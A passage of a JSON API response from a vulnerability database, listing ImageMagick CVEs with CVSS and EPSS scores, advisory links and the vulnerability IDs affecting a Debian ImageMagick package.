}, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27765" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3zbe-p6ue-ffe8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82001?format=api", "vulnerability_id": "VCID-41xr-8ryd-z3ew", "summary": "ImageMagick: integer overflow in MagickCore/quantum-export.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27751.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27751.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27751", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27751" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27751", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27751" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891994", "reference_id": "1891994", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891994" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27751" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-41xr-8ryd-z3ew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81980?format=api", "vulnerability_id": "VCID-453d-2nac-jbdc", "summary": "ImageMagick: outside the range of representable values of type 'unsigned long' at MagickCore/statistic.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27764.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27764.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27764", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26318", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26358", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26399", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26171", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26239", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26287", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26294", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26248", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26189", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26193", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26168", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26131", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26071", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27764" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27764", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27764" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894683", "reference_id": "1894683", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894683" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27764" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-453d-2nac-jbdc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82361?format=api", "vulnerability_id": "VCID-46ey-s7sy-9qby", "summary": "ImageMagick: memory leaks at AcquireMagickMemory due to mishandling the NoSuchImage error in CLIListOperatorImages", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13309.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13309.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.4136", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.41467", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42054", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42082", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.4202", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42072", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42084", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42106", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42069", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42044", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42095", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.41993", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": 